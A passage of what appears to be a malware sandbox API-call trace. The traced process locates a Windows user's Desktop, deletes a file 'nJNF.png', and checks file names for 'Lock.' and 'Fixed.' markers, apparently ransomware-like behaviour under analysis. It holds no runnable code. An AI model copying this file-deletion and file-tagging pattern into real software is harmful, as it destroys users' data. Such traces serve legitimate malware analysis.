RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0188.256] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.256] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416f30 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0188.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/nJNF.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png", lpFilePart=0x8bedfc*="nJNF.png") returned 0x2e [0188.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0188.258] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnf.png")) returned 0x20 [0188.259] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83500, ftCreationTime.dwHighDateTime=0x1d4ce85, ftLastAccessTime.dwLowDateTime=0x243a210, ftLastAccessTime.dwHighDateTime=0x1d4c9fe, ftLastWriteTime.dwLowDateTime=0x243a210, ftLastWriteTime.dwHighDateTime=0x1d4c9fe, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0x65, dwReserved1=0x4, cFileName="nJNF.png", cAlternateFileName="")) returned 0xaa5820 [0188.259] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnf.png")) returned 1 [0188.260] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83500, ftCreationTime.dwHighDateTime=0x1d4ce85, ftLastAccessTime.dwLowDateTime=0x243a210, ftLastAccessTime.dwHighDateTime=0x1d4c9fe, ftLastWriteTime.dwLowDateTime=0x243a210, ftLastWriteTime.dwHighDateTime=0x1d4c9fe, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0x65, dwReserved1=0x4, cFileName="nJNF.png", cAlternateFileName="")) returned 0 [0188.260] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0188.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.261] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0188.261] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.262] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0188.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416f30 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0188.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/nJNF.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png", lpFilePart=0x8bf658*="nJNF.png") returned 0x2e [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0188.265] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJNF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnf.png")) returned 0xffffffff [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.265] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0188.265] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.265] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OPOBoXaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="POBoXaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBoXaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BoXaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oXaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XaM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aM2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.267] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OPOBoXaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="POBoXaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBoXaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BoXaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oXaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XaM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aM2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.268] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0188.268] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0188.268] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.268] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.269] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.269] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0188.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.269] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0188.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.270] 